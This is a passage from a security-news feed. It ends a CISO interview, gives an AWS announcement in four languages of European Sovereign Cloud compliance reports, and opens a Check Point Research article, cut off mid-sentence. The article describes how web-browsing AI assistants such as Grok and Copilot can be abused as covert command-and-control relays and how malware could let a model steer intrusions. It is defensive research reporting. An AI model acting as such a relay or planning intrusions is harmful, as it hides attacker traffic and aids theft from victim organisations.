their own experience); and their view on emerging threats. A CISO’s biggest difficulty. “It’s impossible to prove a negative. When a CISO is doing a great job, nobody notices, because nothing is happening, and it’s very difficult to look back and say, ‘Hey, we haven’t had an incident for the last five years – just look at what a great job I’m doing.’ The problem is you can’t tell whether you haven’t had an incident because you’re lucky or because you’re good. It’s easy to say we’ve had 2 billion attacks over the past five years, and we’ve managed to thwart them all. But that just leads to one of the hardest problems: it’s difficult to say I need more money, even though we haven’t had an incident.” Best career advice received. “The best career advice I ever received,” says Cardwell, “is to bring people along by giving credit – always give credit, never take credit. If I want to get somebody to do something and they do it, then they get all the credit for that, and I don’t take any of it. The next time I ask them to work with me, they’re going to be more likely and eager to do so because they know that I’m going to give them 100% of the credit for the work that they do.” Advice given. “Advice I frequently give is to understand we are not alone in this. If you’re not working with your peers, you are not doing it right. The first thing I do in a new CISO role is to reach out to the chief privacy officer and reach out to the head of audit, because it will make me stronger. If I drop a seed into the soil of the audit department and say, ‘Here’s something I see, but I can’t get any traction on it’, within a couple of months they’re going to start an audit on that place. I don’t have to be the person driving it anymore. I’ve essentially reached out to a partner, and now we’re teamed up on that problem.” Same with privacy. “In many respects, the privacy officer needs to do very similar work to what I’m trying to achieve. If I get closer to that person and partner with privacy, now we can pool our budgets and use the same tools to do the things we’re both trying to do, instead of coming at the problem from different angles.” Biggest current threat. “We’re beginning to see AI-generated spam emails that are so completely personalized to a CEO or a CFO that they look like part of an ongoing conversation – a conversation between the CEO and CFO, complete with thread, but all fake. Whole conversations and back stories written by AI and then brought over to accounting to pay a bill or an invoice. That level of precision and personalization doesn’t get caught by spam filters. It’s a whole different level of social engineering that I don’t think we’re prepared for, and I think it’s going to be one of the next big issues that we must handle.” Related: CISO Conversations: Maarten Van Horenbeeck, SVP & Chief Security Officer at Adobe Related: CISO Conversations: Jaya Baloo From Rapid7 and Jonathan Trull From Qualys Related: CISO Conversations: LinkedIn’s Geoff Belknap and Meta’s Guy Rosen Related: CISO Conversations: Nick McKenzie (Bugcrowd) and Chris Evans (HackerOne)
securityweek.comMar 11, 2026extracted
AWS European Sovereign Cloud achieves first compliance milestone: SOC 2 and C5 reports plus seven ISO certifications
AWS European Sovereign Cloud achieves first compliance milestone: SOC 2 and C5 reports plus seven ISO certifications English |French | German | Italian In January 2026, we announced the general availability of the AWS European Sovereign Cloud, a new, independent cloud for Europe entirely located within the European Union (EU), and physically and logically separate from all other AWS Regions. The unique approach of the AWS European Sovereign Cloud provides the only fully featured, independently operated sovereign cloud backed by strong technical controls, sovereign assurances, and legal protections designed to meet the sensitive data needs of European governments and enterprises. One of the foundational components of how AWS European Sovereign Cloud enables verifiable trust of technical controls and delivers assurance is through our compliance programs and assurance frameworks. These programs help customers understand the robust controls in place at AWS European Sovereign Cloud to maintain security and compliance of the cloud. To meet the needs of our customers, we committed that the AWS European Sovereign Cloud will maintain key certifications such as ISO/IEC 27001:2022, System and Organization Controls (SOC) reports, and Cloud Computing Compliance Criteria Catalogue (C5) attestation, all validated regularly by independent auditors to assure our controls are designed appropriately, operate effectively, and can help customers satisfy their compliance obligations. Today, AWS European Sovereign Cloud is pleased to announce that SOC 2 and C5 Type 1 attestation reports, along with seven key ISO certifications (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018, and 9001:2015) are now available. The attestation reports cover 69 AWS services operating within the AWS European Sovereign Cloud, while the certificates have integrated the AWS European Sovereign Cloud region into the global AWS Management Systems. This achievement marks a pivotal first step in our journey to establish the AWS European Sovereign Cloud as a trusted and compliant cloud for European organizations. By securing these foundational certifications and attestation reports early in our implementation, we are demonstrating our commitment to earning customer trust. AWS European Sovereign Cloud customers in Germany and across Europe can now run their applications with enhanced assurance and confidence that our infrastructure aligns with internationally recognized security standards and the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). These certifications and attestation reports provide independent validation of our security controls and operational practices, demonstrating our commitment to meeting the heightened expectations towards cloud service providers. Beyond compliance, these certifications and reports help customers meet regulatory requirements and innovate with confidence. SOC 2 Type 1 report SOC reports are independent third-party examinations that show how AWS European Sovereign Cloud meets compliance controls and sovereignty objectives. The AWS European Sovereign Cloud SOC 2 report addresses three critical AICPA Trust Services Criteria: Security, Availability, and Confidentiality and includes internal controls mapped to the ESC-SRF. The ESC-SRF establishes sovereignty criteria across key domains including governance independence, operational control, data residency, and technical isolation. As part of the SOC 2 Type 1 attestation, independent third-party auditors have validated suitability of the design and implementation of our controls addressing measures such as independent European Union (EU) corporate structures, operation by EU-resident AWS personnel, strict residency requirements for Customer Content and Customer-Created Metadata, and separation from all other AWS Regions. The ESC-SRF controls in our SOC 2 report show customers how AWS delivers on its sovereignty commitments. C5 Type 1 report C5 is a German Government-backed attestation scheme introduced in Germany by the Federal Office for Information Security (BSI) and represents one of the most comprehensive cloud security standards in Europe. The AWS European Sovereign Cloud C5 Type 1 report provides customers with independent third-party attestation on the suitability of the design and implementation of our controls to meet both C5 basic criteria and C5 additional criteria. The basic criteria establish fundamental security requirements for cloud service providers, covering areas such as organization of information security, human resources security, asset management, access control, cryptography, physical security, operations security, communications security, system acquisition and development, supplier relationships, incident management, business continuity, and compliance. The additional criteria address enhanced requirements for handling sensitive data and critical applications, making this attestation particularly valuable for AWS European Sovereign Cloud customers with stringent data security and sovereignty requirements. Key ISO certifications AWS European Sovereign Cloud region has achieved successful onboarding to seven key ISO certifications that collectively demonstrate comprehensive operational excellence: ISO 27001:2022 for information security management ISO 27017:2015 for cloud-specific security controls ISO 27018:2019 for personal data protection in cloud environments ISO 27701:2019 for privacy information management ISO 22301:2019 for business continuity and organizational resilience ISO 20000-1:2018 for IT service management ISO 9001:2015 for quality management These certifications confirm that AWS European Sovereign Cloud region has been integrated into comprehensive frameworks for managing security, privacy, continuity, service delivery, and quality, helping to ensure sensitive information remains secure, services remain available, and operations meet the highest standards through systematic risk management processes and continuous improvement practices. How to access the reports To access SOC 2, C5 reports and ISO certifications, customers should sign in to their AWS European Sovereign Cloud account and navigate to AWS Artifact in the AWS Management Console. AWS Artifact is a self-service portal that provides on-demand access to AWS compliance reports and certifications. We recognize that compliance is not a destination but a continuous journey, and these initial SOC 2, C5 reports and ISO certifications represent the beginning of our certification portfolio. They lay the essential groundwork upon which we will continue to build to meet AWS European Sovereign Cloud customers’ compliance needs as they continue to evolve. As we expand our compliance coverage in the months ahead, customers can be confident that security, transparency, and regulatory alignment have been part of the very DNA of the AWS European Sovereign Cloud design from day one. To learn more about our compliance and security programs, visit AWS European Sovereign Cloud Compliance, or reach out to your AWS European Sovereign Cloud account team. Security and compliance is a shared responsibility between AWS European Sovereign Cloud and the customer. For more information, see the AWS Shared Security Responsibility Model. If you have feedback about this post, submit comments in the Comments section below. French version L’AWS European Sovereign Cloud franchit une première étape en matière de conformité avec les rapports SOC 2 et C5, et sept certifications ISO En janvier 2026, nous avons annoncé la disponibilité générale de l’AWS European Sovereign Cloud, un nouveau cloud indépendant, pour l’Europe, entièrement situé au sein de l’Union européenne (UE) et séparé physiquement et logiquement de toutes les autres Régions AWS. L’approche unique de l’AWS European Sovereign Cloud en fait le seul cloud souverain entièrement équipé et géré de manière indépendante, soutenu par des contrôles techniques stricts, des garanties de souveraineté et des protections juridiques conçues pour répondre aux besoins des entreprises et des organismes publics européens en matière de données sensibles. Nos programmes de conformité et nos cadres de sécurité sont des éléments fondamentaux grâce auxquels l’AWS European Sovereign Cloud permet de garantir une confiance vérifiable dans les contrôles techniques et de fournir une assurance. Ces programmes aident les clients à comprendre les contrôles rigoureux mis en place dans l’AWS European Sovereign Cloud afin de garantir la sécurité et la conformité du cloud. Pour répondre aux besoins de nos clients, nous nous sommes engagés à ce que l’AWS European Sovereign Cloud conserve des certifications clés telles que la norme ISO/IEC 27001:2022, les rapports sur les contrôles des systèmes et des organisations (SOC, System and Organization Controls) et l’attestation du Catalogue de critères de conformité du cloud computing (C5), toutes validées régulièrement par des auditeurs indépendants afin de garantir que nos contrôles sont conçus de manière appropriée, fonctionnent efficacement et peuvent aider les clients à respecter leurs obligations de conformité. Aujourd’hui, l’AWS European Sovereign Cloud a le plaisir d’annoncer que les rapports d’attestation SOC 2 et C5 de Type 1, ainsi que sept certifications ISO clés (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018 et 9001:2015) sont désormais disponibles. Les rapports d’attestation couvrent 69 services AWS opérant au sein de l’AWS European Sovereign Cloud, tandis que les certificats ont intégré la Région de l’AWS European Sovereign Cloud dans les systèmes de gestion AWS mondiaux. Cette réalisation marque une première étape cruciale dans notre parcours visant à faire de l’AWS European Sovereign Cloud un cloud fiable et conforme pour les organisations européennes. En obtenant ces certifications fondamentales et ces rapports d’attestation dès le début de notre mise en œuvre, nous démontrons notre engagement à gagner la confiance de nos clients. Les clients de l’AWS European Sovereign Cloud en Allemagne et dans toute l’Europe peuvent désormais exécuter leurs applications avec l’assurance que notre infrastructure est conforme aux normes de sécurité reconnues au niveau international et au Cadre de référence souverain de l’AWS European Sovereign Cloud (ESC-SRF). Ces certifications et rapports d’attestation fournissent une validation indépendante de nos contrôles de sécurité et de nos pratiques opérationnelles, démontrant ainsi notre engagement à répondre aux attentes accrues envers les fournisseurs de services cloud. Au-delà de la conformité, ces certifications et rapports aident les clients à respecter les exigences réglementaires et à innover en toute confiance. Rapport SOC 2 Type 1 Les rapports SOC sont des examens indépendants réalisés par des tiers qui montrent comment l’AWS European Sovereign Cloud répond aux contrôles de conformité et aux objectifs de souveraineté. Le rapport SOC 2 pour l’AWS European Sovereign Cloud répond à trois critères essentiels de services de confiance de l’AICPA (Sécurité, Disponibilité et Confidentialité), et inclut des contrôles internes mappés à l’ESC-SRF. L’ESC-SRF établit des critères de souveraineté dans des domaines clés, notamment l’indépendance de la gouvernance, le contrôle opérationnel, la résidence des données et l’isolation technique. Dans le cadre de l’attestation SOC 2 Type 1, des auditeurs tiers indépendants ont validé la pertinence de la conception et de la mise en œuvre de nos contrôles portant sur des mesures telles que les structures d’entreprise indépendantes de l’Union européenne (UE), la gestion par du personnel AWS résidant dans l’UE, les exigences de résidence strictes pour le contenu client et les métadonnées créées par le client, et la séparation avec toutes les autres Régions AWS. Les contrôles ESC-SRF présentés dans notre rapport SOC 2 montrent aux clients comment AWS tient ses engagements en matière de souveraineté. Rapport C5 Type 1 Le C5 est un système d’attestation soutenu par le gouvernement allemand, introduit en Allemagne par l’Office fédéral de la sécurité des technologies de l’information (BSI). Il représente l’une des normes de sécurité du cloud les plus complètes d’Europe. Le rapport C5 Type 1 pour l’AWS European Sovereign Cloud fournit aux clients une attestation tierce indépendante concernant la pertinence de la conception et de la mise en œuvre de nos contrôles pour répondre à la fois aux critères de base et supplémentaires du C5. Les critères de base établissent les exigences de sécurité fondamentales pour les fournisseurs de services cloud, couvrant des domaines tels que l’organisation de la sécurité de l’information, la sécurité des ressources humaines, la gestion des actifs, le contrôle des accès, la cryptographie, la sécurité physique, la sécurité des opérations, la sécurité des communications, l’acquisition et le développement de systèmes, les relations avec les fournisseurs, la gestion des incidents, la continuité des activités et la conformité. Les critères supplémentaires concernent des exigences accrues en matière de gestion des données sensibles et des applications critiques, ce qui rend cette attestation particulièrement utile pour les clients de l’AWS European Sovereign Cloud soumis à des exigences strictes en matière de sécurité des données et de souveraineté. Principales certifications ISO La Région de l’AWS European Sovereign Cloud a obtenu avec succès sept certifications ISO clés, qui démontrent collectivement une excellence opérationnelle globale : ISO 27001:2022 pour la gestion de la sécurité des informations ISO 27017:2015 pour les contrôles de sécurité spécifiques au cloud ISO 27018:2019 pour la protection des données personnelles dans les environnements cloud ISO 27701:2019 pour la gestion des informations relatives à la vie privée ISO 22301:2019 pour la continuité des activités et la résilience organisationnelle ISO 20000-1:2018 pour la gestion des services informatiques ISO 9001:2015 pour la gestion de la qualité Ces certifications confirment que la Région de l’AWS European Sovereign Cloud a été intégrée dans des cadres complets de gestion de la sécurité, de la confidentialité, de la continuité, de la prestation de services et de la qualité. Cela contribue à garantir la sécurité des informations sensibles, la disponibilité des services et le respect des normes les plus élevées grâce à des processus de gestion des risques systématiques et à des pratiques d’amélioration continue. Comment accéder aux rapports Pour accéder aux rapports SOC 2 et C5 ainsi qu’aux certifications ISO, les clients doivent se connecter à leur compte AWS European Sovereign Cloud et accéder à AWS Artifact dans la Console de gestion AWS. AWS Artifact est un portail en libre-service qui fournit un accès à la demande aux rapports de conformité et aux certifications AWS. Nous savons que la conformité n’est pas une destination, mais un parcours continu. Ces premiers rapports SOC 2 et C5, ainsi que les certifications ISO, ne sont que le début de notre portefeuille de certifications. Ils jettent les bases essentielles sur lesquelles nous continuerons à nous appuyer pour répondre aux besoins de conformité des clients de l’AWS European Sovereign Cloud, au fur et à mesure de leur évolution. À mesure que nous étendrons notre couverture de conformité dans les mois à venir, les clients auront l’assurance que la sécurité, la transparence et le respect des réglementations font partie de l’ADN même de l’AWS European Sovereign Cloud, et ce dès le premier jour. Pour en savoir plus sur nos programmes de conformité et de sécurité, consultez la page Conformité pour l’AWS European Sovereign Cloud ou contactez l’équipe responsable de votre compte AWS European Sovereign Cloud. La sécurité et la conformité sont une responsabilité partagée entre l’AWS European Sovereign Cloud et le client. Pour plus d’informations, consultez le Modèle de responsabilité partagée en matière de sécurité d’AWS. Si vous avez des commentaires sur cet article, envoyez-les via la section Commentaires ci-dessous. German version AWS European Sovereign Cloud erreicht den ersten Compliance-Meilenstein: SOC2- und C5-Berichte sowie sieben ISO-Zertifizierungen Im Januar 2026 haben wir die allgemeine Verfügbarkeit der AWS European Sovereign Cloud verkündet, einer neuen, unabhängigen Cloud in Europa, die sich vollständig in der Europäischen Union (EU) befindet und physisch und logisch von allen anderen AWS-Regionen getrennt ist. Die AWS European Sovereign Cloud verfolgt einen einzigartigen Ansatz: Sie ist die einzige souveräne Cloud mit vollem Funktionsumfang, die unabhängig betrieben wird. Starke technische Kontrollen, Souveränitätszusicherungen und rechtliche Schutzmaßnahmen stellen sicher, dass die Anforderungen europäischer Regierungen und Unternehmen an den Umgang mit sensiblen Daten erfüllt werden. Eines der grundlegenden Elemente, mit denen die AWS European Sovereign Cloud überprüfbares Vertrauen in technische Kontrollen schafft und Sicherheit gewährleistet, sind unsere Compliance-Programme und Assurance-Frameworks. Sie helfen Kunden zu verstehen, welche robusten Kontrollen in der AWS European Sovereign Cloud greifen, um Sicherheit und Compliance der Cloud aufrechtzuerhalten. Um den Bedürfnissen unserer Kunden gerecht zu werden, haben wir uns dazu verpflichtet, dass AWS European Sovereign Cloud wichtige Zertifizierungen wie ISO/IEC 27001:2022, System and Organization Controls (SOC)-Berichte und ein Cloud Computing Compliance Criteria Catalogue (C5)-Testat erhält. Alle diese Zertifizierungen und Attestierungen werden regelmäßig von unabhängigen Prüfern validiert, um sicherzustellen, dass unsere Kontrollen angemessen konzipiert sind, effektiv funktionieren und Kunden bei der Erfüllung ihrer Compliance-Verpflichtungen unterstützen. AWS European Sovereign Cloud freut sich, heute bekanntgeben zu können, dass die SOC2– und C5 Type 1-Zertifizierungsberichte sowie sieben wichtige ISO-Zertifizierungen (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018 und 9001:2015) verfügbar sind. Die Attestierungen decken 69 AWS-Services ab, die in der AWS European Sovereign Cloud betrieben werden. Die Zertifizierungen hingegen haben die AWS European Sovereign Cloud Region in die globalen AWS-Managementsysteme integriert. Dieser Erfolg ist ein entscheidender erster Schritt auf unserem Weg, dieAWS European Sovereign Cloud als vertrauenswürdige und konforme Cloud für europäische Organisationen zu etablieren. Indem wir diese grundlegenden Zertifizierungen und Prüfberichte bereits früh in der Umsetzung erlangen, unterstreichen wir unser Engagement, das Vertrauen unserer Kunden zu gewinnen. Kunden der AWS European Sovereign Cloud in Deutschland und ganz Europa können ihre Anwendungen nun mit der Gewissheit betreiben, dass unsere Infrastruktur international anerkannten Sicherheitsstandards sowie dem AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF) entsprechen. Diese Zertifizierungen und Prüfberichte bieten eine unabhängige Validierung unserer Sicherheitskontrollen und betrieblichen Abläufe und belegen unser Engagement, den gestiegenen Erwartungen an Cloud-Dienstleister gerecht zu werden. Über die reine Compliance hinaus helfen sie Kunden dabei, regulatorische Anforderungen zu erfüllen und mit Zuversicht innovativ zu sein. SOC2 Type 1-Bericht SOC-Berichte sind unabhängige Untersuchungen durch Dritte, die zeigen, wie AWS European Sovereign Cloud Compliance-Kontrollen und Souveränitätsziele erfüllt. Der SOC2-Bericht der AWS European Sovereign Cloud behandelt drei entscheidende AICPA-Kriterien (American Institute of Certified Public Accountants): Sicherheit, Verfügbarkeit und Vertraulichkeit. Außerdem umfasst er interne Kontrollen, die dem ESC-SRF zugeordnet sind. Das ESC-SRF legt Souveränitätskriterien in Schlüsselbereichen fest, darunter die Unabhängigkeit der Unternehmensführung, die operative Kontrolle, die Datenresidenz und die technische Isolierung. Im Rahmen der SOC2 Type 1-Zertifizierung haben unabhängige externe Prüfer die Eignung des Designs und die Umsetzung unserer Kontrollen validiert. Diese betreffen Maßnahmen wie unabhängige Unternehmensstrukturen in der Europäischen Union (EU), Betrieb durch in der EU ansässige AWS-Mitarbeiter, strenge Anforderungen an den Wohnsitz, wenn es um Kundeninhalte und von Kunden erstellte Metadaten geht, sowie die Trennung von allen anderen AWS-Regionen. Die ESC-SRF-Kontrollen in unserem SOC2-Bericht zeigen Kunden, wie AWS seinen Souveränitätsverpflichtungen nachkommt. C5 Type 1-Bericht C5 ist ein von der Deutschen Bundesregierung unterstütztes Zertifizierungssystem, das in Deutschland vom Bundesamt für Sicherheit in der Informationstechnik (BSI) eingeführt wurde und einen der umfassendsten Cloud-Sicherheitsstandards in Europa darstellt. Der C5 Type 1-Bericht von AWS European Sovereign Cloud ist für Kunden eine unabhängige Bestätigung durch Dritte, dass das Design und die Implementierung unserer Kontrollen dazu geeignet sind, die Basis-und die Zusatzkriterien zu erfüllen. Die Basiskriterien legen fundamentale Sicherheitsanforderungen für Cloud Service Provider fest und decken Bereiche wie Organisation der Informationssicherheit, Sicherheit des Personals, Management der Vermögenswerte, Zugangs- und Zugriffskontrolle, Verschlüsselung/Kryptographie, Physische Sicherheit, Sicherheit im Betrieb, Sicherheit der Kommunikation, Beschaffung und Entwicklung von Informationssystemen, Beziehungen zu Lieferanten, Vorfallmanagement, Business Continuity und Compliance ab. Die zusätzlichen Kriterien beziehen sich auf erweiterte Anforderungen für den Umgang mit sensiblen Daten und kritischen Anwendungen, wobei diese Zertifizierung wegen ihrer strengen Anforderungen an Datensicherheit und Souveränität für Kunden von AWS European Sovereign Cloud besonders wertvoll ist. Wichtige ISO-Zertifizierungen Die Region von AWS European Sovereign Cloud hat erfolgreich sieben wichtige ISO-Zertifizierungen erhalten, die zusammen umfassende betriebliche Exzellenz belegen: ISO 27001:2022 für das Informationssicherheitsmanagement ISO 27017:2015 für Cloud-spezifische Sicherheitskontrollen ISO 27018:2019 für den Schutz personenbezogener Daten in Cloud-Umgebungen ISO 27701:2019 für die Verwaltung personenbezogener Daten ISO 22301:2019 für betriebliche Kontinuität und organisatorische Resilienz ISO 20000-1:2018 für IT-Service-Management ISO 9001:2015 für Qualitätsmanagement Diese Zertifizierungen bestätigen, dass die AWS European Sovereign Cloud Region in umfassende Frameworks zur Verwaltung von Sicherheit, Datenschutz, Business Continuity, Servicebereitstellung und Qualität integriert wurde. Dies trägt dazu bei, dass vertrauliche Informationen durchgehend geschützt sind, Dienste verfügbar bleiben und der Betrieb durch systematische Risikomanagementprozesse und kontinuierliche Verbesserungspraktiken den höchsten Standards entspricht. So greifen Sie auf die Berichte zu Um auf die SOC2-/C5-Berichte und die ISO-Zertifikate zuzugreifen, sollten sich Kunden bei ihrem Konto in der AWS European Sovereign Cloud anmelden und in der AWS-Managementkonsole zu AWS Artifact navigieren. AWS Artifact ist ein Self-Service-Portal, das bei Bedarf Zugriff auf AWS-Compliance-Berichte und -Zertifizierungen bietet. Wir sind uns bewusst, dass Compliance kein Ziel, sondern ein kontinuierlicher Prozess ist. Daher stellen diese ersten SOC2-/C5-Berichte und ISO-Zertifizierungen nur den Beginn unseres Complianceportfolios dar. Sie bilden die Grundlage für das Rahmenwerk, das wir errichten, um die sich laufend verändernden Compliance-Anforderungen der Kunden von AWS European Sovereign Cloud zu erfüllen. In den kommenden Monaten erweitern wir unsere Compliance-Abdeckung und Kunden können sich darauf verlassen, dass Sicherheit, Transparenz und regulatorische Ausrichtung vom ersten Tag an wesentliche Bestandteile des Designs von AWS European Sovereign Cloud waren. Um mehr über unsere Compliance- und Sicherheitsprogramme zu erfahren, besuchen Sie AWS European Sovereign Cloud Compliance oder wenden Sie sich an Ihr Account-Team von AWS European Sovereign Cloud. Sicherheit und Compliance liegen in der gemeinsamen Verantwortung von AWS European Sovereign Cloud und dem Kunden. Weitere Informationen finden Sie im AWS-Modell der geteilten Verantwortung für Sicherheit. Wenn Sie Feedback zu diesem Beitrag abgeben möchten, übermitteln Sie Ihre Anmerkungen im Abschnitt „Kommentare“ unten. Italian version AWS European Sovereign Cloud raggiunge il primo traguardo di conformità: i report SOC 2 e C5 più sette certificazioni ISO A gennaio 2026, abbiamo annunciato la disponibilità a livello generale di AWS European Sovereign Cloud, un nuovo cloud indipendente per l’Europa interamente situato nell’Unione europea (UE) e separato fisicamente e logicamente da tutte le altre Regioni AWS. L’approccio esclusivo di AWS European Sovereign Cloud offre l’unico cloud sovrano con funzionalità complete e a gestione autonoma, supportato da solidi controlli tecnici, garanzie di sovranità e protezioni legali, creato per rispondere alle esigenze di governi e imprese in Europa in materia di dati sensibili. Uno dei componenti fondamentali con cui AWS European Sovereign Cloud consente l’affidabilità verificabile dei controlli tecnici e offre garanzie è rappresentato dai programmi di conformità e dai framework di garanzia. Questi programmi aiutano i clienti a comprendere i controlli rigorosi adottati nell’AWS European Sovereign Cloud per preservare la sicurezza e la conformità del cloud. Per soddisfare le esigenze dei clienti, ci siamo impegnati affinché AWS European Sovereign Cloud mantenga certificazioni chiave come ISO/IEC 27001:2022, i report System and Organization Controls (SOC) e l’attestazione Cloud Computing Compliance Criteria Catalogue (C5), tutte convalidate regolarmente da auditor indipendenti per assicurare che i controlli siano progettati in modo appropriato, funzionino efficacemente e possano aiutare i clienti a soddisfare i loro obblighi di conformità. Oggi, AWS European Sovereign Cloud è lieto di annunciare che sono ora disponibili i report di attestazione SOC 2 e C5 Type 1, insieme a sette certificazioni ISO chiave (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018 e 9001:2015). I report di attestazione riguardano 69 servizi AWS che operano all’interno dell’AWS European Sovereign Cloud, mentre i certificati hanno integrato la Regione AWS European Sovereign Cloud nei sistemi di gestione AWS globali. Questo risultato segna un primo passo fondamentale nel nostro percorso volto a far sì che AWS European Sovereign Cloud si affermi come cloud affidabile e conforme per le organizzazioni europee. Garantendo queste certificazioni e report di attestazione fondamentali nelle prime fasi dell’implementazione, dimostriamo il nostro impegno a ottenere la fiducia dei clienti. I clienti di AWS European Sovereign Cloud in Germania e in tutta Europa ora possono eseguire le loro applicazioni con maggiori garanzie e più fiducia nel fatto che l’infrastruttura rispetta gli standard di sicurezza riconosciuti a livello internazionale, nonché l’AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). Queste certificazioni e report di attestazione rappresentano una convalida effettuata da terze parti indipendenti sui nostri controlli di sicurezza e sulle nostre pratiche operative, e dimostrano il nostro impegno a rispondere alle aspettative sempre più elevate che il mercato pone ai provider di servizi cloud. Oltre a supportare la conformità normativa, queste certificazioni e report aiutano i clienti a soddisfare i propri obblighi regolamentari e a innovare con maggiore sicurezza. Report SOC 2 Type 1 I report SOC sono esami condotti da terze parti indipendenti che mostrano come AWS European Sovereign Cloud soddisfi i controlli di conformità e gli obiettivi di sovranità. Il report SOC 2 dell’AWS European Sovereign Cloud affronta tre Trust Services Criteria dell’AICPA critici: sicurezza, disponibilità e riservatezza e include controlli interni mappati all’ESC-SRF. L’ESC-SRF stabilisce criteri di sovranità in domini chiave, tra cui l’indipendenza della governance, il controllo operativo, la residenza dei dati e l’isolamento tecnico. Nell’ambito dell’attestazione SOC 2 Type 1, auditor indipendenti di terze parti hanno convalidato l’idoneità della progettazione e dell’implementazione dei nostri controlli rispetto a misure quali: le strutture aziendali indipendenti nella Unione europea (UE), la gestione operativa affidata a personale AWS residente nell’UE, severi requisiti di residenza per i contenuti i e i metadati creati dei clienti, nonché la separazione da tutte le altre Regioni AWS. I controlli ESC-SRF contenuti nel report SOC 2 mostrano ai clienti come AWS rispetta i suoi impegni in materia di sovranità. Report C5 Type 1 C5 è uno schema di attestazione, supportato dal governo tedesco e introdotto in Germania dall’Ufficio federale per la sicurezza delle informazioni (BSI) e rappresenta uno degli standard di sicurezza cloud più completi in Europa. Il report C5 Type 1 dell’AWS European Sovereign Cloud fornisce ai clienti un’attestazione indipendente di terze parti sull’idoneità della progettazione e dell’implementazione dei nostri controlli volti a soddisfare sia i criteri C5 di base sia i criteri C5 aggiuntivi. I criteri di base stabiliscono i requisiti di sicurezza fondamentali per i provider di servizi cloud, coprendo aree quali l’organizzazione della sicurezza delle informazioni, la sicurezza delle risorse umane, la gestione delle risorse, il controllo degli accessi, la crittografia, la sicurezza fisica, la sicurezza delle operazioni, la sicurezza delle comunicazioni, l’acquisizione e lo sviluppo del sistema, le relazioni con i fornitori, la gestione degli incidenti, la continuità operativa e la conformità. I criteri aggiuntivi rispondono a requisiti avanzati per la gestione di dati sensibili e applicazioni critiche, rendendo questa attestazione particolarmente utile per i clienti di AWS European Sovereign Cloud con severi requisiti di sovranità e sicurezza dei dati. Principali certificazioni ISO La Regione di AWS European Sovereign Cloud ha ottenuto con successo l’inserimento di sette certificazioni ISO chiave che dimostrano collettivamente un’eccellenza operativa completa: ISO 27001:2022 per la gestione della sicurezza delle informazioni ISO 27017:2015 per controlli di sicurezza specifici per il cloud ISO 27018:2019 per la protezione dei dati personali in ambienti cloud ISO 27701:2019 per la gestione delle informazioni sulla privacy ISO 22301:2019 per la continuità aziendale e la resilienza organizzativa ISO 20000-1:2018 per la gestione dei servizi IT ISO 9001:2015 per la gestione della qualità Queste certificazioni confermano che la Regione di AWS European Sovereign Cloud è stata integrata in framework completi per la gestione di sicurezza, privacy, continuità, erogazione dei servizi e qualità, contribuendo a garantire che le informazioni sensibili siano protette, i servizi rimangano disponibili e le operazioni soddisfino gli standard più elevati attraverso processi sistematici di gestione del rischio e pratiche di miglioramento continuo. Come accedere ai report Per accedere ai report SOC 2, C5 e alle certificazioni ISO, è necessario che i clienti accedano al proprio account AWS European Sovereign Cloud e ad AWS Artifact nella Console di gestione AWS. AWS Artifact è un portale self-service che fornisce l’accesso, su richiesta, ai report e alle certificazioni di conformità di AWS. Sappiamo che la conformità non è una destinazione ma un viaggio continuo, e questi report SOC 2 e C5 iniziali, insieme alle certificazioni ISO, costituiscono l’inizio del nostro portafoglio di certificazioni. Rappresentano le basi essenziali su cui continueremo a costruire per soddisfare le esigenze di conformità dei clienti di AWS European Sovereign Cloud via via che continuano a evolversi. Man mano che espanderemo la nostra copertura in materia di conformità nei prossimi mesi, i clienti possono essere certi che sicurezza, trasparenza e allineamento normativo sono stati parte del DNA stesso della progettazione di AWS European Sovereign Cloud, sin dal primo giorno. Per saperne di più sui nostri programmi di conformità e sicurezza, visita AWS European Sovereign Cloud Compliance o contatta il team dell’account AWS European Sovereign Cloud. La sicurezza e la conformità sono una responsabilità condivisa tra AWS European Sovereign Cloud e il cliente. Per ulteriori informazioni, consulta il modello di responsabilità condivisa AWS sulla sicurezza. Se hai commenti su questo post, invia commenti nella sezione Commenti qui sotto.
aws.amazon.comMar 10, 2026extracted
AI in the Middle: Turning Web-Based AI Services into C2 Proxies & The Future Of AI Driven Attacks
AI in the Middle: Turning Web-Based AI Services into C2 Proxies & The Future Of AI Driven Attacks February 17, 2026 Key Points Check Point Research (CPR) has discovered that certain AI assistants that support web browsing or URL fetching can be abused as covert command-and-control relays (“AI as a proxy”), allowing attacker traffic to blend seamlessly into legitimate, commonly permitted enterprise communications. This technique was demonstrated against platforms such as Grok and Microsoft Copilot, leveraging anonymous web access combined with browsing and summarization prompts The same mechanism can also enable AI-assisted malware operations, including generating reconnaissance workflows, scripting attacker actions, and dynamically deciding “what to do next” during an intrusion. CPR outlines a near-term evolution in malware development, where implants shift from static logic to prompt-driven, adaptive behavior that can autonomously plan operations, prioritize targets and data, and adjust tactics in real-time based on environmental feedback. Introduction AI is rapidly becoming embedded in day-to-day enterprise workflows, inside browsers, collaboration suites, and developer tooling. As a result, AI service domains increasingly blend into normal corporate traffic, often allowed by default and rarely treated as sensitive egress. Threat actors are already capitalizing on this shift. Across the malware ecosystem, AI is being used to accelerate development and operations: generating and refining code, drafting phishing content, translating lures, producing PowerShell snippets, summarizing stolen data, assisting operators with next decisions during an intrusion, and, in extreme cases, developing full C2 frameworks such as Voidlink. The practical outcome is simple: AI reduces cost and time-to-scale, and helps less-skilled actors execute more complex playbooks. But the next step is more consequential: AI isn’t only helping attackers write malware, it can become part of the malware’s runtime. In AI-Driven malware, the implant’s behavior is shaped dynamically by model output. Instead of relying solely on hardcoded decision trees, an implant can collect host context such as environment artifacts, user role indicators, installed software, domain membership, and geography, and use a model to triage victims, choose actions, prioritize data, and adapt tactics. This prompt-driven approach can make campaigns more flexible and harder to predict, especially as it shifts decision-making away from static code and toward external reasoning.In this research, Check Point Research demonstrates a concrete building block that connects these trends: AI assistants with web-browsing and URL-fetch capabilities can be abused as covert command-and-control relays, effectively using AI as a C2 proxy. We show how Grok and Microsoft Copilot can be driven through their web interfaces to fetch attacker-controlled URLs and return responses, creating a bidirectional channel that tunnels victim data out and commands back in. Crucially, this 